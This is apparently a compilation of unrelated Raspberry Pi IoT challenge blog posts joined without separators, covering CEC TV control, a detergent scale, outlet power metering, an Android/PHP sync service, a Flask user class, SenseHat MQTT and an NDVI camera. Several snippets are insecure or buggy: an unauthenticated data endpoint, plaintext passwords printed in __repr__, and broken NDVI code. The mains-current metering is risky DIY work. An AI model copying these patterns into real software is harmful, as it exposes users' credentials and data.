illuminanceIsLowerOrEqual(livingMoodTop.on(), 70l), waitForOn(Devices.tv.on(), homeTheaterTv), waitForOn(appleTv.on(), denon), waitForOn(Devices.tv.on(), appleTv), waitForFullyOn(new ListCommand(asList( denon.input(Input.TV), denon.volume(50) )), denon) ), asList( Devices.tv.off(), livingMoodTop.off(), waitForOff(homeTheaterTv.off(), Devices.tv) ) ); Here the scenes are split in two. The homeTheaterBase is the basis for all different home theater scenes: e.g. the one for the Apple TV is displayed here, or the one for Blu-ray. It also allows me to switch from one to another without turning everything off. As you can see lots of commands are dependent on each other, so devices have to wait for some other devices before starting up. The most obvious case is that you first have to turn on the power before you can turn on the device itself, or give the device more commands. The receiver has a special qualifier waitForFullOn: this is because it has two stages of powering on. Firstly CEC reports it's turned on (this is the normal on-state) and later the API reports the powered-on status as well (the full-on-state). We're interested in both of them as it's not possible to send any commands through the API before it reaches the fully-on-state. Time for a quick demo: Note: as this is the demo, the launch takes a bit of more time then usually. Please be patient There is one thing left to integrate: Plex! This will be the subject of part 3. This module is actually made of two parts but they both are based on weighting things, and they both can be implemented for more than laundry. 1. Notification when you have enough dirty clothes to make a washing cycle Most washing machines have a limit of how many clothes they can wash on one cycle based on weight. The first part is a scale that tells you when you reached that weight. For this I first imagined making three drawers ( one for whites, one for blacks and one for colors ) and the system could notify me when one of the drawers is close the the washing machine's limit. 2. Notification for how many washing cycles you can do with your available detergent. As mentioned before, this is also based on weighting things, in this case the bag of detergent. Even if there are small fluctuations the quantity of detergent you use for a wash is almost the same. The system can take into consideration as the quantity needed for one wash the quantity that is missing between two different measurements, and make an average. This way it can tell you how many washing cycles you can make at any time and you can consult this when you are shopping and you don't know if you need to buy detergent or not. One thing to take into consideration is to make a logic that resolves problems based on unusual handling. For example you can take the box from the scale when you use it and the system would add into the statistic that you used 5 kilos of detergent; so it has to disregard this reading by not taking 0 into consideration. Another possibility is to use some detergent for something else or borrow some to another person. In this case there will be an abnormal usage and the system should persist this quantity and take it into consideration only if it repeats a couple of times. The third thing to take into consideration on implementation would be the adding of new detergent, the system should reset the quantity it takes into consideration but again, you could press on the scale with your hand while you fill the detergent box at the same time as the system is calculating the weight, so this issue should be handled. For this I think it would be safe to take into consideration only the values that persist for half an hour. The whole calculation for this system would take place on the raspberry pi and a weight sensor could be attached to it using the same I2C protocol as described in the posts before this one. The sensor should only send the weight to the main server and then all the calculation would take place there. This system can be used for any other thing that you use in a consistent manner. For example the coffee, I for one am using roughly the same amount of coffee every morning. Since the actual weights are not needed since the calculation is based on the statistics of the usual consumption, you can use it on anything. Before note: I am not and electrical engineer nor do I have experience working in this field. Please double check anything I say in this post before trying it yourself. Previous posts: Pi IoT - Simone - Introduction Pi IoT - Simone - #1 - Light Controller Pi IoT - Simone - #2 - Main System Pi IoT - Simone - #3 - Door / Window notifier For this part of the project the main idea is to have a device that can calculate the power consumption on each wall outlet in particular. This can give you a good statistic of the power consumption and it can help you minimize the energy needed to run your house. The control part comes with the ability to turn the sockets on and off. Mostly this feature is not very useful but if you have kids for example you could start a socket only for two hours so you can charge your phone and then it will be safe for the kids to play around. This is only an example but you can find other uses for this. The switch part is the same as the one for the light switches, it acts the same way and it has a relay so it can be implemented the same way. One thing to take into consideration is the power consumption and the limit of the relay you are using or you could burn it very easily. The main chalange of this part of the project is to make a component that can accurately calculate the power consumption even for small consumers. The I2C Protocol described in the previous posts is good enough to send the information to the Raspberry Pi and it has the processing power to display it in any form needed. I will get more into details but first I would like to say that this is very dangerous and this should not be implemented by someone who does not have any experience in working with high currents. Also spend a while searching online for discussions and topics about this and also safety advices. If you do want to go ahead with this, here are some things to take into consideration one by one before plugging in a device: 1. Reconsider if you really need to do it and if it is worth it. 2. Make sure the component is not plugged in when you are arranging everything for the test 3. Make sure you are at least one meter away from the device during the testing phase when it is plugged in. You don't know for sure what will happen and mistakes can be made. 4. It is better to have somebody with you at a safe distance so he can help but in case you are working alone make sure there are no people in the area so they do not touch anything by mistake 5. Remove all animals from the room. 6. Make sure you isolate your component well from anything that might be a conductor ( I burned a component because it made a contact through a wooden floor ) 7. You should always be able to stop the power at any time, without getting close to the component you are testing 8. Minimize the damage if anything is wrong by keeping the device away from other instruments you use and not connected to anything. 9. Try to develop a way that you can see the readings from a distance or record them on to something so you don't have to get close 10. Make sure your calculations are right and double check them. 11. Reconsider again if you really want to do this 12. Never let the component unsupervised while plugged in unless it is well tested and well isolated. Please comment below any thoughts on this and I will add them to the list above. I would be glad if this list can be a genuine checklist of thing to consider before testing components with high current. Now that this is said, here are some options that can be used to calculate the power consumption: 1. The safest way to do this ( not really safe but safer than others I know ) was mentioned to me in a previous post by jc2048 and it refer to the SCT 013-030. More details can be found at 3. AardEnergy – Current and Voltage Transformers . Again, thank you Jon for the advice. 2. A nice component that I found is this one: It works pretty well but it is not a non intrusive solution as the one above. I for one tried to replicate it and ended up with a pretty good current sensor ( but it looks horrible mostly because I bought the wrong size trimmers) 3. The device that I mentioned in the lights controller blog (Pi IoT - Simone - #1 - Light Controller ). The schematics is below. There should be an operational amplifier on the receiving end of the device. I have to mention that this is by far the unsafest one of the three mentioned here. Below is a picture the one I used and it worked until (as mentioned before) it made a connection through the floor blew (taking along with it on the friendly ride an Arduino board, an ATTiny, some pins on a Raspberry Pi, my computer's Moderboard and a fuse. The fuse was easy to replace so see again the item 8 on the list above): Make sure for something like this that the resistor can hold up the power consumption of the socket. For this list also let me know if you have other ideas. I will add them to the list. I will continue this post with more information regarding this component when I have some progress. To finish the Android competition application, I need to add the "updating functions". That is, send the information not updated to the Central Node (web server) and wait for a confirmation. If the confirmation arrives, information is in the Raspberry Pi3 whereas, when not confirmation is received, data should be resent in the next cycle. This will require: We are focusing on the smart phone to central node communication. Data flow will start from the phone (client) to the central node (server). 1)User's node sends a HTTP_POST containing: The server check the id, and if it is the right one, it will extract the distance tracked information. 2)This information is saved into the database (created in post #5) to be access later on by the main GUI 3) If writing is successful, send response back to phone 4) The data packet structure is that of an HTTP_POST. The message, however, will contain a String with a JSON Array format: this way, I can have send several samples (several rows in the database), each of them with a key:value format. As a result, when the server receives the HTTP_POST, it will be easy to extract and identify each value. (*)NOTE - SECURITY . There is no type of protection against eavesdropping/ nor any security whatsoever. Nevertheless, traffic between user's node and central node should be, at least encrypted in the future. Initial setup: Nexus 5 / Android / SmartCompetitionHome App v 1 I include a new java class to the project: ServerConnector.java It makes use of the libraries: This class will be implementing an AsyncHttpResponseHandler (asyncHttpResponseHandler). This class defines two call back, onSuccess (when we obtain a successful response from the server) and onFailure (when we get some error). As stated before, this is an Asyncronous wait which will not freeze the app while the server response is traveling back. It also holds fields with the server information: URL to send data to, JSONID etc. Another important characteristic is the JSON String formatting of packages. To create this structure, this class implements convertToJSON method to obtain the desire JSON Array object from a List of Map<String, String> public String convertToJSON( List<Map<String, String>> args){ String json = ""; Gson gson = new GsonBuilder().create(); //Use GSON to serialize Array List to JSON try { json = gson.toJson(args); }catch (Exception e){ System.out.println("Could not convert to JSON!: "+e); } return json; So, the call to send a package to the server is as follows: /** * sendToIITServer() * Function to send a JSON object to IIT server */ public void sendToCentralNode(String json, String url){ if (url != null && !url.equals("")) { System.out.println("Sending: " + json); System.out.println(url); //Set parameters RequestParams params = new RequestParams(); params.put(_JSON_ID, json); //Send http request httpClient.post(url, params, asyncHTTPClient); sending = true; }else{ System.out.println("Empty URL - Not sending"); } The app should be able to send the data automatically (instead of having a SEND button). This can be done with a timer, every X seconds. However, I will use an even simpler solution since data recording does not have a high sample rate, nor do I need a lot of computation to process the track information. Data will be send every 5 new location detected. The code is found in CompetitionTrackActivity if(num_locations == _LOCATIONS_TO_SEND){ num_locations = 0; List<Map<String, String>> notUpdated = myDB.getAllNotUpdatedValues(user_name, columnsTable, DatabaseManager.upDateColumn, DatabaseManager.updatedStatusNo); mServer.sendToCentralNode(mServer.convertToJSON(notUpdated), mServer.WRITE_URL); (*)getAllNotUpdatedValues reads from the database all values that where not updated In order to maintain sync databases in the server and in the phone, we use an extra column to flag the state of each sample ("synchronized"). This way, when we send data, we only send samples with synchronized = 'no'. Afterwards, when the ACK arrives from the server, this synchronized is turn into a 'yes' Initial setup: Raspberry Pi 3 - Raspbian SO (Jessie) / SSH Enabled / Mosquitto MQTT Broker installed / MQTT Subsciber client / Console interface / Python GTK interface / MySQL Server / Apache2 web Server In post #5 I showed how to do a port forwarding from the WiFi router to the Central node. I used port 80, to have web traffic redirected to the web server in the Raspberry Pi 3 (also, using port 80). However, for the competition service, I will be using another port. It can be done in two steps: The server will be receiving HTTP post request from the phone. It will make sure it is the intended data, then decode it an try to save it into the database. Therefore, the proccess for any new request is: 1. Obtain the JSON Array Object $json = $_POST["id_for_JSON"]; //Remove Slashes if (get_magic_quotes_gpc()){ $json = stripslashes($json); } //Decode JSON into an Array //Json structure: //{var data = ['{"table":"Name of table"}', '{"column1":"value1",..,"columnN": "value2"}'];} $data = json_decode($json); } 2. For each JSON Object, try to store it in the database for ($i =0; $i < count($data); $i ++){ //Get keys of JSON for sensors values $res = $db->storeInTable($data[$i]->table_name, $data[$i]->date_time, $data[$i], $data[$i]->synchronized); //Build the array to send back $response[$i] = $res; } (*)storeInTable is the function I designed to store each sample in the database. It requires table_name, date_time and synchronized fields to be passed separately. The other values can be stored automatically. During the process, we also generate the $response, which will be encoded into another JSON packet. The difference will reside in the 'synchronized ' flag. If data was successfully updated in the database, 'synchronized' will be turn to 'yes' so that phone can then update its own local database. We have our complete Competition application. Which means that, right now, the platform can: To finish the platform, we will have to update our main GUI ! That's right! What's an episode without the "made for TV suspect that the blogging application is "downscaling" my videos which resulted in previous episodes being somewhat blurry. This episode was generated using the highest resolution available. When viewing it, make sure that you use full screen mode and let me know if the text is sharp and clear. I hope you have found this useful and informative. Rick Oftentimes it seems that as programmers, or anything else for that matter, we get caught up in a particular pattern for doing things. One that I see quite often is the use of SQL databases in various projects. The "kids" these days are introduced to SQL as a primer for programming and can't think how to handle persistence without it. To show that life can exist without a formal database, HangarControl is being written using some very simple mechanisms for creating, reading, and updating information. In a future episode, I will discuss the Flask-Login module. Flask-Login is a set of helper routines to streamline user session management. As it is written in Python, it expects that your users can be accessed as "User" objects. One might be tempted to just fire up SQLAlchemy (SQLAlchemy - The Database Toolkit for Python ) and start creating a database. Instead, we're going to create a class that provides everything needed without the overhead of a database manager. According to the documentation, Flask-Login requires the following properties and methods: We can easily provide this directly from our favorite text editor. I have broken up the various portions for discussion purposes. Trust that they are all that makes up the 'user.py' file. # Get a template object for our User record. from flask_login import UserMixin class User(UserMixin): # This is an array that will be shared across all instances of this class users = [] # This method is automatically called when a new instance of User is created. # Notice at the end where the *class* User appends this new instance to our # users list. Just think "SQL insert". def __init__(self, username, acctnum, password=None, fullname=None, active=True): self.username = username self.acctnum = acctnum self.fullname = fullname self.password = password self.active = active User.users.append(self) Here is something that I recommend you do that just makes your (debugging) liffe so much easier: Create a method for rendering your object in a human readable form! # Any class that you create should implement __repr__. This provides a # convenient method to display a human readable representation of your object. def __repr__(self): return "<User username:%s acctnum:%s password:%s fullname:%s>" % \ (self.username, self.acctnum, self.password, self.fullname) If you've done any work with Python, the above pattern is pretty familiar. Next we implement the methods that Flask-Login is expecting from us. # These are required by the Flask-Login module def is_active(self): return self.active def is_anonymous(self): return False def is_authenticated(self): return True def get_id(self): return self.username The final portion of our User class is the piece that makes all this "what's a database anyway?" talk complete. Here we are simply defining a mechanism or language, if you will, to query User records in a structured way. Ooh, see what I did there? (Okay, "... structured ... query ... language ...") That's okay, my kids didn't think it was funny either. # The @classmethod decorator (think "modifier") makes the method definition # available by this syntax: "User.find_by_attr(...)". The important concept # is that this method isn't used by individual 'user records', rather the # collection of all 'user' records. @classmethod def find_by_attr(cls,key,target): for user in User.users: if getattr(user,key) == target: return user break else: return None @classmethod def find_by_username(cls,target): return cls.find_by_attr('username',target) Now that we have an implementation of a User, let's take a look at how it will be utilized. $ python >>> from lib.user import User >>> User('admin', 0, 'pilot', 'Administrator') <User username:admin acctnum:0 password:pilot fullname:Administrator> >>> User('pilot', 142, 'secret', 'Ima Pilot') <User username:pilot acctnum:142 password:secret fullname:Ima Pilot> >>> User.users [ <User username:admin acctnum:0 password:pilot fullname:Administrator>, <User username:pilot acctnum:142 password:secret fullname:Ima Pilot>] >>> User.find_by_username('admin') <User username:admin acctnum:0 password:pilot fullname:Administrator> >>> User.find_by_username('whodat') >>> User.find_by_username('whodat') == None hope you have found this useful and, in the future, aren't afraid to "go naked" and skip the SQL database! Rick In my last post I shared the variety of boxes I found at the local Walmart ranging in price from 25 cents to 10 cents. Today I had a chance to try 2 of them on for size and fit and quickly decided the midsize one seems almost made for being used for a Raspberry Pi implementation with the 7 inch Touchscreen! If I remember correctly it was also only 10 cents! As I had mentioned the idea was to take the Farm Operations Center setup out of it's base setup which was just a no container, everything hanging out in the air condition, to a more protected containment system of a box. Looking around there were a variety of interesting cases that could be ordered or made from a 3D printer, but I don't have a 3D printer, yet, and I wanted flexibility to add parts and pieces easily without worrying about outgrowing the containment. One item I am really looking forward to is adding a battery to make it portable, so some extra space was a must. As such I looked into the larger of the 3 cases first, cutting out a hole large enough to slip the metal frame on to allow screws to be drilled through the case and securing it. My original hole was in the top of the case. I think mainly because a case is designed with the top up so that is what I tried. :-) Here I am showing the F.O.C. mounted to the large box. Another box is shown above to give you an idea of depth for expansion. While this wasn't bad there were 2 issues from my point of view. First mounting to the top of the case, the lid, just wasn't the best option for being able to run cables through main box since you would have to carefully open the lid every time watching all of the cable routing. Second, it just didn't feel comfortable in my hand. That extra depth made if feel like a plastic brick. If you don't plan on holding the F.O.C. Box and just want a containment system to set to the side and use perhaps with an external keyboard and mouse option, then the larger box is not a bad way to go. Especially for only 25 cents. Here is the mid-sized option. Just a tad smaller in the depth. It looks even smaller then it is because this time I flipped the box over and used the bottom to mount the screen. This fits my hand much better and I can imagine using the touchscreen and the potential of a battery setup very easily with this in place. It is hard to tell in this picture, tomorrow I will try to get a new picture with the screws in place and everything wired in, but for now if you look at the 4 plastic squares on the box, they actually line up perfectly with the metal mounting spots on the RPi Screen. As you can see from the bottom box that I have not cut into, the little boxes are recessed and the extruded part of the metal frame fits right into those. Making for a great fit once you take some washers and screws and fit it together! 10 cents is not a bad price either, in fact I spent more on the screws and washers then the boxes. Here we have the new F.O.C. Box sitting in front of my laptop with both of them connected to the MotionEyeOs RPi B+. The odd picture is actually my ceiling fan & light reflected in the outside window. The latch of the box works great as an angle provider for the box to be used in a standing position. I am very pleased with how this came together! I want to actually be able to mount it above my laptops in my desk area in the future and I think the Box will allow for that easily. *********************************************************************************************************************************************************************** On the Farm/Fowl side of things I wanted to share just how incredibly fast ducks can foul their water. It is crazy! It also makes for great tree watering supply but still, yuck! Here is a picture of one of the ducklings being introduced to the pool and enjoying it quite a bit! We previously had the ducklings and baby keats in the garage. Word of caution to potential duck owners, ducklings like to play in their water and that quickly makes the entire garage smell very very bad! We had a pretty good rain so the ducks had tracked even more then a normal amount of dirt into the water making it look not quite so refreshing to me. So today was Duck Water Refresh day. Ah clean water! We won't even wait to let it fill up the pool! Here we have some more water in the pool, and you may notice that the clean part seems to be diminishing. Kind of like bath water now. :-) I guess "clean" water is a somewhat broad term when it comes to ducks. But boy are they happy! I was waiting for the new sensehat to reach me before writing this post, but the recent updates suggests that I may not get it before the deadline. So I decided to go on with the faulty one I have. Although the code will work regardless of the sensehat condition, the output I showing here will b faulty because of my hat. In this post, I'll getting data from sense hat and publish it to MQTT broker. Later this data is displayed as a freeboard dash with MQTT plugin. Hardware Setup This post will be using the SenseHat I got as a part of the challenge kit. SenseHat for raspberry pi is a addon board which houses For more details about SenseHat, visit Raspberry Pi Sense HAT or The sensehat can be mounted on the raspberry pi (here I use Pi3) with the screws provided with the sensehat. It will look like: Next is to install the libraries for sensehat. To install them: $ sudo apt-get update $ sudo apt-get install sense-hat This will install the c/c++ and python libraries for using sense hat. Now you need to restart the system for the changes to take effect; $ sudo reboot Now you should be able to use SenseHat. Software Setup For this post, I'll using a python script which will read the values from environmental sensors and publish it using MQTT to topic 'usr/vish/sensehat'. Each packet will a JSON object like: {"pressure":"1010.0576171875","temperature":"-422.7525634765625","humidity":"-39.87132263183594"} For this, we'll be using Paho MQTT python client library. Installation of the library is described in [PiIoT#06]: Ambient monitoring with Enocean sensors. Once the library is installed, we are ready to go. To get the sensor values the script is roughly like this: ## Init Sensehat import sense_hat as sHat sh = sHat.SenseHat(); # Function to read the sensor and send data def senseNsend( client ): dataPacket = {} # Get environmental sensors data from sense hat dataPacket['humidity'] = sh.get_humidity() dataPacket['pressure'] = sh.get_pressure() dataPacket['temperature'] = sh.get_temperature() mqttPacket = "{" + ','.join( '"%s":"%r"' %(k,v) for (k,v) in dataPacket.iteritems() ) + "}" #Now send 'mqttPacket' to broker # End of Function More documentation on using Environmental sensors on SenseHat can be obtained from Next this is to create a MQTT broker connection and send the actual packet. import paho.mqtt.client as mqtt import paho.mqtt.publish as publish basePath = 'usr/vish/' appPath = 'sensehat' # MQTT Broker Params mqtt_broker = "192.168.1.54" mqtt_port = 1883 ## Define MQTT callbacks def onConnect( client, userData, retCode ): print "Connected to broker." client.publish( basePath+'devices/sensehat', '{"name":"sensehat","desc":"Sensehat to MQTT bridge"}' ) client = mqtt.Client( client_id = "sh2mqtt_bridge", clean_session = True ) client.on_connect = onConnect client.connect( mqtt_broker, mqtt_port, 60 ) client.loop_start() This will create a client named 'sh2mqtt_bridge' and connect it to the IP at mqtt_broker. Now we can publish a packet to the broker with: client.publish( basePath+appPath, mqttPacket ) Here I have put the topic to publish as basePath+appPath = 'usr/vish/sensehat' The complete code is attached to your reference. You can use one of the MQTT debugging tools like MQTTSpy to monitor the messages in topic 'usr/vish/sensehat'. Designing the dashboard Now we will be using freeboard to design the dashboard for viewing data. I have already explained how to host freeboard with nodejs in [PiIoT#01] : Designing a dash board and Freeboard MQTT plugin in [PiIot#04]: Freeboarding with MQTT. Follow the instructions and start your freeboard sensor. Follow the instructions to create the dashboard: Finally you dashboard will be looking like this: You will be able to view the values send by your sensehat( Note that here the values are faulty because of my Sensehat) Now you can save this to 'www/freeboard/dashboards' directory of you nodejs script as 'senseHat.json'. File is attached below. To view the dashboard later, goto http://<freeboard host IP>:8080/#source=dashboards/senseHat.json. Sense Your Environment For demo, I have modified the update interval to 3 sec. Below is a video of demo where I'm using my android phone's chrome to view the sensehat data. Happy Coding, vish << Prev | Index | Next >> During these last 2 days and before the official end of the Challenge, I have managed to integrate my Foscam IPCam into the DomPi project. This will probably be the last post with some solid progress. Let´s go into the details! Previous Posts Project Status At home I have an IPCam like the one in the picture below. The reason for leveraging this ipcam instead of the PiCam is based on two points:. These two days I have made one additional improvement to a previous rule. I added some fine tunning to the alarm, so that when the Alarm Switch is activated, it resets the Alarm Status by turning it off. These are some snapshots of the final view of the openHAB web interface for DomPi. This is the final dashboard of the nodes, I am conscious that not all of the cells are green, but hope that you have enjoyed the journey since May till now with the DomPi project An important part of Thuis is integration of our Home Theater system. As the integration is quite extensive and consists of several components, this will be a 3-part blog series. In the first part we start with communicating to CEC-enabled devices from a Raspberry Pi. In the second part we will integrate CEC with the rest of Thuis, and make sure everything works properly together. In the third - and last - part of the Home Theater series we will add the support for Plex. Let's start with a short introduction of CEC itself. CEC stands for Consumer Electronics Control and is a feature of HDMI. CEC enables HDMI-devices to communicate with each other. In the ideal situation this means a user only needs one remote control to control all his devices: TV, AV receiver, Blu-ray player, etc. Unfortunately many manufacturers use their own variation of CEC and therefore in a lot of cases one still needs multiple remotes. To get an idea about the protocol have a look a CEC-O-MATIC, this is a great reference for all available commands! The good news is that the GPU of the Raspberry Pi supports CEC out of the box! To be able to handle the different dialects of CEC, Pulse Eight developed libcec. It enables you to interact with other HDMI devices without having to worry about the communication overhead, handshaking and all the differences between manufacturers. In contrast to what I mentioned in [Pi IoT] Thuis #5: Cooking up the nodes – Thuis Cookbook Raspbian Jessie nowadays provides version 3.0.1 in the Apt repository, so there is no need to use the version from Stretch anymore. I've updated the cookbook accordingly. Other than that provisioning the Raspberry Pi using Chef was straightforward. libCEC comes with the tool cec-client. This basically gives you a terminal for CEC commands. When we execute cec-client you see it connecting to HDMI and collecting some information about other devices, then we can give it commands. For example we ask it for all devices currently connected with the scan command: thuis-server-tv# cec-client -d 16 -t r log level set to 16 == using device type 'recording device' CEC Parser created - libCEC version 3.0.1 no serial port given. trying autodetect: path: Raspberry Pi com port: RPI opening a connection to the CEC adapter... DEBUG: [ 94] Broadcast (F): osd name set to 'Broadcast' DEBUG: [ 96] InitHostCEC - vchiq_initialise succeeded DEBUG: [ 98] InitHostCEC - vchi_initialise succeeded DEBUG: [ 99] InitHostCEC - vchi_connect succeeded DEBUG: [ 100] logical address changed to Free use (e) DEBUG: [ 102] Open - vc_cec initialised DEBUG: [ 105] << Broadcast (F) -> TV (0): POLL // Receiving information from the TV // ... // Request information about all connected devices scan requesting CEC bus information ... DEBUG: [ 41440] << Recorder 1 (1) -> Playback 1 (4): POLL DEBUG: [ 41472] >> POLL sent DEBUG: [ 41473] Playback 1 (4): device status changed into 'present' // ... CEC bus information =================== device #0: TV address: 0.0.0.0 active source: no vendor: Sony osd string: TV CEC version: 1.4 power status: on language: dut device #1: Recorder 1 address: 1.6.0.0 active source: no vendor: Pulse Eight osd string: CECTester CEC version: 1.4 power status: on language: eng device #4: Playback 1 address: 1.1.0.0 active source: yes vendor: Unknown osd string: Apple TV CEC version: 1.4 power status: on language: ??? device #5: Audio address: 1.0.0.0 active source: no vendor: Denon osd string: AVR-X2000 CEC version: 1.4 power status: on language: ??? currently active source: Playback 1 (4) // indicates a comment added by me, // ... indicates output that was hidden as it's not needed for understanding As you can see currently 4 devices are connected to the bus, including the Raspberry Pi itself (device #1). The Apple TV is the currently active source. You can tell cec-client which output it should give with the -d parameter. We'll use this for our integration by choosing -d 8, which just displays the traffic on the bus. To integrate libCEC (or more specifically cec-client) with Java we have to write a wrapper around it. We'll do that in a similar way as MQTT-CDI, so the Java code can observe events happening on the CEC-bus via a CDI observer. I wrote the initial version about a year ago and the full source code is available on my GitHub as Edubits/cec-cdi. It does not support the full CEC protocol yet, but most of the usual commands are available. For example you're able to turn on and off your devices, and send UI commands like play, pause, volume up, etc. You can of course also monitor these same functions, so the app will for example know when you turn off the TV manually. You can add CEC-CDI to your own project by adding the following dependency to your pom.xml: <dependency> <groupId>nl.edubits.cec</groupId> <artifactId>cec-cdi</artifactId> <version>1.0-SNAPSHOT</version> </dependency> Monitoring what happens in the home theatre system can be done using CDI observers. Currently you can just add a qualifier for the source device, later I might also add some more sophisticated qualifiers such as the type of a command. When you're interesting in all messages send from the TV you can observe them like this: @ApplicationScoped public class CecObserverBean { public void tvMessage(@Observes @CecSource(TV) Message message) { logger.info("Message received from TV: " + message); } } To turn the TV on you can send it the IMAGE_VIEW_ON message without any arguments, for putting it in standby you use the STANDBY command. In Java this looks as follows: public class SendExample { @Inject private CecConnection connection; public void send() { // Send message from RECORDER1 (by default the device running this code) to the TV to turn on connection.sendMessage(new Message(RECORDER1, TV, IMAGE_VIEW_ON, Collections.emptyList(), "")); // Send message from RECORDER1 (by default the device running this code) to the TV to turn off connection.sendMessage(new Message(RECORDER1, TV, STANDBY, Collections.emptyList(), "")); } } Just like the Core application described in [Pi IoT] Thuis #8: Core v2: A Java EE application, this will be a Java EE application running on WildFly. It includes CEC-CDI. The application itself is quite simple as it's only function is bridging between CEC and MQTT. So we have two @ApplicationScoped beans observing events. The CecObserverBean forwards specific messages from the CEC bus to MQTT. In the example it monitors the power state of the television. Note that my Sony television has its own dialect as well, depending on how the TV is turned off it reports the official STANDBY command or gives a vendor specific command. When turning on it's supposed to report a certain command as well, but the Sony decides to skip it. That's why - as workaround - I listen to REPORT_PHYSICAL_ADDRESS, which is a command it always gives during power on. package nl.edubits.thuis.server.tv.cec; @Startup @ApplicationScoped public class CecObserverBean { @Inject MqttService mqttService; public void tvMessage(@Observes @CecSource(TV) Message message) { if (message.getDestination() != BROADCAST && message.getDestination() != RECORDER1) { return; } switch (message.getOperator()) { case STANDBY: mqttService.publishMessage("Thuis/device/living/homeTheater/tv", "off"); break; case REPORT_PHYSICAL_ADDRESS: mqttService.publishMessage("Thuis/device/living/homeTheater/tv", "on"); break; case VENDOR_COMMAND_WITH_ID: if (message.getRawMessage().equals("0f:a0:08:00:46:00:09:00:01") || message.getRawMessage().equals("0f:87:08:00:46")) { mqttService.publishMessage("Thuis/device/living/homeTheater/tv", "off"); } default: break; } } } The opposite happens in the MqttObserverBean, which listens to MQTT messages and executes the corresponding CEC commands. Here we'll turn the TV on and off and then ask the TV to report its power status back: package nl.edubits.thuis.server.tv.mqtt; @ApplicationScoped public class MqttObserverBean { @Inject private CecConnection connection; public void onActionMessageTV(@Observes @MqttTopic("Thuis/device/living/homeTheater/tv/set") MqttMessage message) { switch(message.asText()) { case "on": connection.sendMessage(new Message(RECORDER1, TV, IMAGE_VIEW_ON, Collections.emptyList(), "")); case "off": connection.sendMessage(new Message(RECORDER1, TV, STANDBY, Collections.emptyList(), "")); } connection.sendMessage(new Message(RECORDER1, TV, REPORT_POWER_STATUS, Collections.emptyList(), "")); } } This concludes our implementation of the TV node. It's now able to listen to other CEC-enabled devices, communicate with them and bridge this through MQTT messages. In part 2 we'll take these MQTT messages, wrap them and create some scenes to turn everything on with a single button! After quite a bit of hard work during the last days, the project reached its end. Of course many improvements can be made, and other features can be added, but that is for later, after the challenge. I had the plan to add humidity, pressure and temperature measurements with the SenseHat, but unfortunately SenseHat, Wi-Pi and PiFace digital were missing from my kit. I this post I will briefly explain the ndvicam.py python code which mainly does all the work. I will finish with a number of example images. [Pi IoT] Plant Health Camera #10 - connecting the Master and Slave Pi Below is the source code of ndvicam.py. I added comments for each step so the code is self explaining. After some initializations an endless loop is started While True: in which first a live image is shown until a key is pressed. There are five options: After pressing q the program terminates, after pressing any other key, an image is captured from the camera and a trigger is send to the slave so that this also captures an image, see [Pi IoT] Plant Health Camera #7 - Synchronizing the cameras for details. Then also this image is loaded from the share which was mounted from the slave pi (details can be found in [Pi IoT] Plant Health Camera #6 - Putting the slave Pi to work). Then the images of the two cameras are aligned, as described in [Pi IoT] Plant Health Camera #8 - Aligning the images. I tested the options TRANSLATION, AFFINE and HOMOGRAPHY, by commenting out the specific setting. After the images are aligned, the NVDI, GNDVI and BNDVI are calculated, and depending on which key was pressed, one of them is displayed. After a key is pressed, or after ten seconds all images (noir, color, nevi, gndvi and bndvi) are saved, with a timestamp in the filename. # import the necessary packages from picamera.array import PiRGBArray from picamera import PiCamera import RPi.GPIO as GPIO import time import numpy import readchar import datetime import cv2 # initialize the camera and grab a reference to the raw camera capture camera = PiCamera() camera.ISO = 100 camera.resolution = (800, 480) rawCapture = PiRGBArray(camera) # Define the motion model warp_mode = cv2.MOTION_TRANSLATION #warp_mode = cv2.MOTION_AFFINE #warp_mode = cv2.MOTION_HOMOGRAPHY # Define 2x3 or 3x3 matrices and initialize the matrix to identity if warp_mode == cv2.MOTION_HOMOGRAPHY : warp_matrix = numpy.eye(3, 3, dtype=numpy.float32) else : warp_matrix = numpy.eye(2, 3, dtype=numpy) # allow the camera to warmup time.sleep(0.1) # GPIO Setup GPIO.setmode(GPIO.BCM) GPIO.setup(18, GPIO.OUT) GPIO.output(18, 0) while True: print("Usage:") print(" q: Quit") print(" c: Show Color Image") print(" o: Show NoIR Image") print(" n: Show NDVI Image") print(" g: Show GNDVI Image") print(" b: Show BNDVI Image") camera.start_preview() c = readchar.readchar() camera.stop_preview() if c=='q': print('quit ndvicam.py') break # grab an image from the camera camera.capture(rawCapture, format="bgr") noir_image = rawCapture.array # trigger camera on slave and load GPIO.output(18, 1) time.sleep(1) GPIO.output(18, 0) time.sleep(1) color_image = cv2.imread('pi1iot_share/slave_image.jpg',cv2.IMREAD_COLOR) # extract nir, red green and blue channel nir_channel = noir_image[:,:,0]/256.0 green_channel = noir_image[:,:,1]/256.0 blue_channel = noir_image[:,:,2]/256.0 red_channel = color_image[:,:,0]/256.0 # align the images # Run the ECC algorithm. The results are stored in warp_matrix. # Find size of image1 sz = color_image.shape (cc, warp_matrix) = cv2.findTransformECC (color_image[:,:,1],noir_image[:,:,1],warp_matrix, warp_mode, criteria) if warp_mode == cv2.MOTION_HOMOGRAPHY : # Use warpPerspective for Homography nir_aligned = cv2.warpPerspective (nir_channel, warp_matrix, (sz[1],sz[0]), flags=cv2.INTER_LINEAR + cv2.WARP_INVERSE_MAP) else : # Use warpAffine for nit_channel, Euclidean and Affine nir_aligned = cv2.warpAffine(nir_channel, warp_matrix, (sz[1],sz[0]), flags=cv2.INTER_LINEAR + cv2.WARP_INVERSE_MAP); # calculate ndvi ndvi_image = (nir_aligned - red_channel)/(nir_aligned + red_channel) ndvi_image = (ndvi_image+1)/2 ndvi_image = cv2.convertScaleAbs(ndvi_image*255) ndvi_image = cv2.applyColorMap(ndvi_image, cv2.COLORMAP_JET) # calculate gndvi_image gndvi_image = (nir_channel - green_channel)/(nir_channel + green_channel) gndvi_image = (gndvi_image+1)/2 gndvi_image = cv2.convertScaleAbs(gndvi_image*255) gndvi_image = cv2.applyColorMap(gndvi_image, cv2.COLORMAP_JET) # calculate bndvi_image bndvi_image = (nir_channel - blue_channel)/(nir_channel + blue_channel) bndvi_image = (bndvi_image+1)/2 bndvi_image = cv2.convertScaleAbs(bndvi_image*255) bndvi_image = cv2.applyColorMap(bndvi_image, cv2.COLORMAP_JET) # display the image based on key pressed on screen if c == 'o': cv2.imshow("Image", noir_image) elif c == 'c': cv2.imshow("Image", color_image) elif c == 'n': cv2.imshow("Image", ndvi_image) elif c == 'b': cv2.imshow("Image", bndvi_image) elif c == 'g': cv2.imshow("Image", gndvi_image) # wait at most 10 